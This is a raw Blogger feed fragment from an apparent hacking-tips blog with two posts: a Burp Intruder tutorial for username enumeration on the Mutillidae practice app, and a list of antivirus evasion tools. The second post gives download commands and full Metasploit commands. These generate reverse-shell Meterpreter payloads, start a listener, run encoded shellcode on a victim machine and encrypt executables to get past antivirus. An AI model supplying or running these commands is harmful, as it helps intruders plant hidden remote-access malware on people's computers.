&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWKtNM-KeNnVLybWsFOZtrW9FQyJwF6p2uSVl7KoJyB8bufErO6iqajwF-rleqxso2TvFSqTR7Znpbgt6nHbZhmRz4Rj_f46yy5KIcINdadINA_Wc2MohFV4V1HDbYdUSuR3v7RUYVl-NR/s1600/Account.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Username Enumeration Mutillidae&quot; border=&quot;0&quot; height=&quot;112&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWKtNM-KeNnVLybWsFOZtrW9FQyJwF6p2uSVl7KoJyB8bufErO6iqajwF-rleqxso2TvFSqTR7Znpbgt6nHbZhmRz4Rj_f46yy5KIcINdadINA_Wc2MohFV4V1HDbYdUSuR3v7RUYVl-NR/s320/Account.PNG&quot; title=&quot;Username Enumeration Mutillidae&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
So by monitoring web-application message one can know that username is valid or not.&lt;br /&gt;
&lt;br /&gt;
First we will examine source code of page ; when we provide valid username reply is &quot;var lAuthenticationAttemptResultFlag = 1&quot; &amp;amp; when we provide invalid username reply is &quot;var lAuthenticationAttemptResultFlag = 0&quot;&lt;br /&gt;
&lt;br /&gt;
var lAuthenticationAttemptResultFlag = 1&amp;nbsp;&amp;nbsp;&amp;nbsp; It means username exist.&lt;br /&gt;
&lt;br /&gt;
var lAuthenticationAttemptResultFlag = 0&amp;nbsp;&amp;nbsp;&amp;nbsp; It means username does not exist.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Alternatively we can do this by saving both page (valid username &amp;amp; invaild username) source code in text file &amp;amp; then use diff command.&lt;br /&gt;
&lt;br /&gt;
root@bt:~# diff login password &lt;br /&gt;
762c762&lt;br /&gt;
&amp;lt; var lAuthenticationAttemptResultFlag = 0;&lt;br /&gt;
---&lt;br /&gt;
&amp;gt; var lAuthenticationAttemptResultFlag = 1;&lt;br /&gt;
&lt;br /&gt;
Now Open burpe suite, setup listener ; try to sign in from browser &amp;amp; capture request.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3RlmRyqTuZkIqnBYRu2X_CTmDZhGZhrqeXE9KjW4iZ7dvT8Ii3H3SPMyPqkjq8jEhS_vUoiD8Kc8uYBbzYaFhqO2oipq6cmyMEau0cVRC7q-WKFqZD4CWx7kOafiV3HFgowlBHYkjzCOa/s1600/captured.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Burpe-Request&quot; border=&quot;0&quot; height=&quot;270&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3RlmRyqTuZkIqnBYRu2X_CTmDZhGZhrqeXE9KjW4iZ7dvT8Ii3H3SPMyPqkjq8jEhS_vUoiD8Kc8uYBbzYaFhqO2oipq6cmyMEau0cVRC7q-WKFqZD4CWx7kOafiV3HFgowlBHYkjzCOa/s320/captured.PNG&quot; title=&quot;Burpe-Request&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now right click on request &amp;amp; click on send&amp;nbsp; to inrtuder.&lt;br /&gt;
&lt;br /&gt;
For position we choose only username.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlRHqkkWQzNPJkrFaoVTyXpboSr9KBWEboZXjSd0V8Qz16WP11M3UEAKxecCjekyiEv6-OdC1oX6yrKqWrPgED2yYR943qfINaBAH84XWiGMH9Itd0qengNqeAqE_IoFv9xC1sZXCbrkX4/s1600/Intruder.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Burpe-Intruder&quot; border=&quot;0&quot; height=&quot;213&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlRHqkkWQzNPJkrFaoVTyXpboSr9KBWEboZXjSd0V8Qz16WP11M3UEAKxecCjekyiEv6-OdC1oX6yrKqWrPgED2yYR943qfINaBAH84XWiGMH9Itd0qengNqeAqE_IoFv9xC1sZXCbrkX4/s320/Intruder.PNG&quot; title=&quot;Burpe-Intruder&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
On payload tab&amp;nbsp; ---) payload option&amp;nbsp; ----) load sample &lt;a href=&quot;http://pastebin.com/PKxu5HLN&quot; target=&quot;_blank&quot;&gt;username list&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGcYJlAJk13c9XacsAKCcuBU0xViXy8uZiATBjtxXWEk_amrX73bvMoRmYpmBmQCcv7tUVWbbPCch0t_qlqnyOIlPUxc2r96aJWj3f0OEQB45DR3ARl3uh09DojhFTEvAzFvu4wIH7uIA/s1600/payload.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Intruder-Payload&quot; border=&quot;0&quot; height=&quot;224&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGcYJlAJk13c9XacsAKCcuBU0xViXy8uZiATBjtxXWEk_amrX73bvMoRmYpmBmQCcv7tUVWbbPCch0t_qlqnyOIlPUxc2r96aJWj3f0OEQB45DR3ARl3uh09DojhFTEvAzFvu4wIH7uIA/s320/payload.PNG&quot; title=&quot;Intruder-Payload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In option tab &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;---) &amp;nbsp;&amp;nbsp; Grep match&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ---) Add&lt;br /&gt;
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjThc3pl_h8QfRJCoUAjPafuARWOtRe4muiZfGP_K9lpyZM_hLgbBXG_u4O8Uj5HfHA8MOcDaK0brCXFeEd16dPK9kBBjoHpNBnR5F2bUM-gTNuw-EBHn1sL6hIE6pDD5BGuV-GPXwEy8hyphenhyphen/s1600/grep-match.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Intruder-Option&quot; border=&quot;0&quot; height=&quot;252&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjThc3pl_h8QfRJCoUAjPafuARWOtRe4muiZfGP_K9lpyZM_hLgbBXG_u4O8Uj5HfHA8MOcDaK0brCXFeEd16dPK9kBBjoHpNBnR5F2bUM-gTNuw-EBHn1sL6hIE6pDD5BGuV-GPXwEy8hyphenhyphen/s320/grep-match.PNG&quot; title=&quot;Intruder-Option&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Click on intruder ---) start Attack&lt;br /&gt;
&lt;br /&gt;
Now Burpe make request to login page &amp;amp; examine request &amp;amp; classified responce according to option which we provided.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnw_FGqH7iPE8QvWhrnuvWzW5Tc7KdYxUC67HWIuB7wBqkbtOEm6zORCV1LvIrdnRHYR-K1tcsAf6w2rJ3OYVmHQFp89uuyn0mPIK4huSH7qu0tB0MY1gkeij_utV04Jx8B60iDJLC9joY/s1600/attack.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Intruder-Attack&quot; border=&quot;0&quot; height=&quot;219&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnw_FGqH7iPE8QvWhrnuvWzW5Tc7KdYxUC67HWIuB7wBqkbtOEm6zORCV1LvIrdnRHYR-K1tcsAf6w2rJ3OYVmHQFp89uuyn0mPIK4huSH7qu0tB0MY1gkeij_utV04Jx8B60iDJLC9joY/s320/attack.PNG&quot; title=&quot;Intruder-Attack&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Click on save , result table &amp;amp; Delimiter click on custom &amp;amp; put &quot;;&quot; ,then select column which we need , in this case i select payload,var lAuthenticationAttemptResultFlag = 1,var lAuthenticationAttemptResultFlag = 0 and then save it.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYFiyAmT4WGWIlhxCnnGBNd0onbWNBOveBiE_3JDTy-IErw2A4U6_ldpXI5wVtUNwb_3CNohCUSFFO3SArHmh-H715Y6MruNaBBMAYdNkk2CsBk664n6Ro8ChPRMYoFiPZs66142R9Qrs/s1600/Saved_Intruder.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Intruder-Result&quot; border=&quot;0&quot; height=&quot;175&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYFiyAmT4WGWIlhxCnnGBNd0onbWNBOveBiE_3JDTy-IErw2A4U6_ldpXI5wVtUNwb_3CNohCUSFFO3SArHmh-H715Y6MruNaBBMAYdNkk2CsBk664n6Ro8ChPRMYoFiPZs66142R9Qrs/s320/Saved_Intruder.PNG&quot; title=&quot;Intruder-Result&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Saved file is look like following format.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioqL1swylPELs71jxPFul-gv2j0TGtgwbvlrQScczOqm9I-5VW7XCBMVMA_bFJHQHF905vZQ7Q7dFY8aH6A7OIdG1OVg-rFpJkPw7Bc-qiV2cs1xE-B7WwskTjMdF6pHee4XjjS2Kw-IBQ/s1600/response.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Intruder-saved-file&quot; border=&quot;0&quot; height=&quot;224&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioqL1swylPELs71jxPFul-gv2j0TGtgwbvlrQScczOqm9I-5VW7XCBMVMA_bFJHQHF905vZQ7Q7dFY8aH6A7OIdG1OVg-rFpJkPw7Bc-qiV2cs1xE-B7WwskTjMdF6pHee4XjjS2Kw-IBQ/s320/response.PNG&quot; title=&quot;Intruder-saved-file&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In file first is username ; then true means username exist , false menas username is invalid. So now we only need entry which second column is true.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQl6qBC5XSo-NarBQIW9Pz9KNyKCbchslw1-_Fc4NPGgQHsqqklW4cJNcZ4JY2xHiGW7nBNeQpzVzHE0iL9qjfWd6OfR7EUV3NQW8633i8SkJ27-VplYOrDPZ9Hko5304xVqFE6i5K1aE1/s1600/Username.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Possible-Username&quot; border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQl6qBC5XSo-NarBQIW9Pz9KNyKCbchslw1-_Fc4NPGgQHsqqklW4cJNcZ4JY2xHiGW7nBNeQpzVzHE0iL9qjfWd6OfR7EUV3NQW8633i8SkJ27-VplYOrDPZ9Hko5304xVqFE6i5K1aE1/s320/Username.PNG&quot; title=&quot;Possible-Username&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
So i saved this value in another temp file from where you can extract username from file using delimiter. I used simple &lt;a href=&quot;http://pastebin.com/9m3E11CY&quot; target=&quot;_blank&quot;&gt;python script&lt;/a&gt; for this purpose. &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcd8sOkzDUkTvyfC-hW30qdsgJrp-B1RNFyEowCisQXWoShbnbSW_WYu0s2vaav7LfhEES3T3iIeWy0vC4ngvTBUSBttR0eVvvUwJQeYdwA9H6VMx38f_Et0-lGtnAZ3hXO_MDAG1WHQDH/s1600/final-list.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Username List&quot; border=&quot;0&quot; height=&quot;237&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcd8sOkzDUkTvyfC-hW30qdsgJrp-B1RNFyEowCisQXWoShbnbSW_WYu0s2vaav7LfhEES3T3iIeWy0vC4ngvTBUSBttR0eVvvUwJQeYdwA9H6VMx38f_Et0-lGtnAZ3hXO_MDAG1WHQDH/s320/final-list.PNG&quot; title=&quot;Username List&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Finally we got list of username which exist on system.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/140015435051915804/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/140015435051915804'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/140015435051915804'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html' title='Username Enumeration in Mutillidae using Burpe Intruder.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqMZoCoICqMbUOlfsnr9BLDJ2I9rz30Iv8usG2yMDpj9GcSk3tr94REd58kmwsM4tyd4AsNFlBnWZgn1Bn_41xUc14l9LhGy8yneyeA4_MAYXcB3w0YcakvEf10OS65EgsdDaPOb1Kjzwv/s72-c/password.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-5916782611321898696</id><published>2013-10-30T15:50:00.000+05:30</published><updated>2014-02-11T19:01:29.825+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="bypass AV"/><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>List of Differnet AV evasion Frameworks.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Today we are gonna talk about different AV evasion frameworks for metasploit payload &amp;amp; how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(1)Veil:-&lt;/h3&gt;
&lt;br /&gt;
Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot; target=&quot;_blank&quot;&gt;Click here for how to install &amp;amp; use Veil?&lt;/a&gt;&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(2)AV0id :-&lt;/h3&gt;
&lt;br /&gt;
Anti-Virus Bypass Metasploit Payload Generator Script.&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip&lt;br /&gt;
unzip master.zip &lt;br /&gt;
cd metasploitavevasion-master/&lt;br /&gt;
./avoid.sh&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jZP01JHipH2PVvdzM95JY7BcvK2NT7OCw58mvkoapzN7ZD3aj1MUYZGUWVzBFc5iGXDkMOaEoURVBv3idNcAdN3KsL-Ttg8GGef6-LX_v_TSLaZrgiTKakIHymsLf6qLbDi2BaDpRiml/s1600/msfevasion.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Antivirus Evasion&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jZP01JHipH2PVvdzM95JY7BcvK2NT7OCw58mvkoapzN7ZD3aj1MUYZGUWVzBFc5iGXDkMOaEoURVBv3idNcAdN3KsL-Ttg8GGef6-LX_v_TSLaZrgiTKakIHymsLf6qLbDi2BaDpRiml/s320/msfevasion.png&quot; height=&quot;204&quot; title=&quot;Antivirus Evasion&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file &amp;amp; replace line 150 which is IP=$(ifconfig &quot;$IPINT&quot; |grep &quot;inet adr:&quot; |cut -d &quot;:&quot; -f 2 |awk &#39;{ print $1 }&#39;) with IP=$(ifconfig ppp0 | awk &#39;/inet addr/ {split ($2,A,&quot;:&quot;); print A[2]}&#39;).&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTt2ltZFTVruB91stXXUzMbWfbDHNKN-tREqyH_KJpQ30Eqhm7yL_2lc0aQW4UeRl_fvHXyyocMO9Z9x8hokm5j7Lo48Bfq0if7USl7BnroJs-H_bth0qCkTPhVjhoTjSH_4BgcuoIb08/s1600/AV-msfevasion.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;AV-Reports-For-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtTt2ltZFTVruB91stXXUzMbWfbDHNKN-tREqyH_KJpQ30Eqhm7yL_2lc0aQW4UeRl_fvHXyyocMO9Z9x8hokm5j7Lo48Bfq0if7USl7BnroJs-H_bth0qCkTPhVjhoTjSH_4BgcuoIb08/s1600/AV-msfevasion.PNG&quot; title=&quot;AV-Reports-For-payload&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.commonexploits.com/?p=789&quot; target=&quot;_blank&quot;&gt;Click here for original author`s blog. &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(3)Syringe:-&lt;/h3&gt;
&lt;br /&gt;
wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar&lt;br /&gt;
tar xf syringe\ 0.1.tar &lt;br /&gt;
./syringe.sh&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuoSKi-aicPIfoUD74UDzOJqVegcByKcQtqxs-ABeepEDAgR5EpHLtER4XbuFMkFyP1gZ01cy8OdB2-L7rktyFvGCLakJg9msZ6vqgiZ0ULrNR82TOvkyTQq3OcDZuVezsus0ozyMXa77O/s1600/syringe.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Antivirus-Evasion-Using-Syringe&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuoSKi-aicPIfoUD74UDzOJqVegcByKcQtqxs-ABeepEDAgR5EpHLtER4XbuFMkFyP1gZ01cy8OdB2-L7rktyFvGCLakJg9msZ6vqgiZ0ULrNR82TOvkyTQq3OcDZuVezsus0ozyMXa77O/s320/syringe.PNG&quot; height=&quot;297&quot; title=&quot;Antivirus-Evasion-Using-Syringe&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2p9ul2I4o0BgEi1MrbENx_bCedQvR_e6ZDOJoXIIdxPIsNragEE2DFtWSg7p6pytK_bnlu22hnGZG6EYgIfiyueHrlME2JPA8htgG8Kf7S8mLm6sq9j12G9-eSKyLzgSaLks7YJ-FsnEL/s1600/AV-syringe.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;AV-Reports-For-syringe-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2p9ul2I4o0BgEi1MrbENx_bCedQvR_e6ZDOJoXIIdxPIsNragEE2DFtWSg7p6pytK_bnlu22hnGZG6EYgIfiyueHrlME2JPA8htgG8Kf7S8mLm6sq9j12G9-eSKyLzgSaLks7YJ-FsnEL/s320/AV-syringe.PNG&quot; height=&quot;100&quot; title=&quot;AV-Reports-For-syringe-payload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
(4)Shellcodeexec:-&lt;/h3&gt;
&lt;br /&gt;
git clone https://github.com/inquisb/shellcodeexec&lt;br /&gt;
&lt;br /&gt;
we are gonna use downloaded shellcodexec in third step on victim machine.&lt;br /&gt;
&lt;br /&gt;
(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX&lt;br /&gt;
&lt;br /&gt;
(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E&lt;br /&gt;
&lt;br /&gt;
(3)C:\WINDOWS\Temp&amp;gt;shellcodeexec.exe &amp;lt;msfencode&#39;s alphanumeric-encoded payload&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSyVwCsRRMA3WaIVesjDkJh93ZYeRXjrKgpWUgWKWWjgxZ0iE33mIW8VX7bHTv14gaSAPoO_VNmvvrJfbXUi8YlNLRTATkWlqEA63TYUZATPm9_GIYjrUkK4CuRtbb4BHYl1HF0-tJb9_/s1600/AV-shellcodec.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;shellcodeexex-AV-report&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSyVwCsRRMA3WaIVesjDkJh93ZYeRXjrKgpWUgWKWWjgxZ0iE33mIW8VX7bHTv14gaSAPoO_VNmvvrJfbXUi8YlNLRTATkWlqEA63TYUZATPm9_GIYjrUkK4CuRtbb4BHYl1HF0-tJb9_/s320/AV-shellcodec.PNG&quot; height=&quot;110&quot; title=&quot;shellcodeexex-AV-report&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a href=&quot;http://bernardodamele.blogspot.co.uk/2011/04/execute-metasploit-payloads-bypassing.html&quot; target=&quot;_blank&quot;&gt;Click here for detail tutorial on&amp;nbsp; how to use shellcodeexec?&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(5)Hypersion:-&lt;/h3&gt;
&lt;br /&gt;
Hyperion is a runtime encrypter for 32-bit portable executables.&lt;br /&gt;
&lt;br /&gt;
wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip&lt;br /&gt;
unzip Hyperion-1.0.zip &lt;br /&gt;
cd Hyperion-1.0&lt;br /&gt;
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe&lt;br /&gt;
&lt;br /&gt;
Now generate metasploit payload.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wvB_5TQT8R8ZnHvZerIo299pzOjBcKRnu4wFLiveQJLyZokmU2YaGivQm3LU0I7y1KSbKJnSepHL62FeYALrE_iyC2hR0uAmC_IGKS36ZVTVMmqGwf3AvujC3dtv_zuGYpTQSrRrXf5R/s1600/hypersion.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;hyperion-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wvB_5TQT8R8ZnHvZerIo299pzOjBcKRnu4wFLiveQJLyZokmU2YaGivQm3LU0I7y1KSbKJnSepHL62FeYALrE_iyC2hR0uAmC_IGKS36ZVTVMmqGwf3AvujC3dtv_zuGYpTQSrRrXf5R/s320/hypersion.PNG&quot; height=&quot;312&quot; title=&quot;hyperion-payload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe &amp;gt;payload.exe&lt;br /&gt;
wine crypter.exe payload.exe encrypted_payload.exe&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJxJD3spdZ5gyh8mUStF13Rs7bSYfKbjvcUDFgJ5kRHvDQ6BjwSsujmsZnhQPfwsl19ytGlYVtMThAIU9V0SoQjtoTcHslOyMhvYl6tYV2PopiP_LL6YAIY4lRg2YjJkcgp22N9RCSewaQ/s1600/AV-hypersion.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;AV-report-for-hyperion-payload&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJxJD3spdZ5gyh8mUStF13Rs7bSYfKbjvcUDFgJ5kRHvDQ6BjwSsujmsZnhQPfwsl19ytGlYVtMThAIU9V0SoQjtoTcHslOyMhvYl6tYV2PopiP_LL6YAIY4lRg2YjJkcgp22N9RCSewaQ/s320/AV-hypersion.PNG&quot; height=&quot;109&quot; title=&quot;AV-report-for-hyperion-payload&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
(6)Crypter.py:-&lt;/h3&gt;
&lt;br /&gt;
Download it from below link .&lt;br /&gt;
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip&lt;br /&gt;
unzip&amp;nbsp; script.zip&lt;br /&gt;
python crypter.py &lt;br /&gt;
&lt;br /&gt;
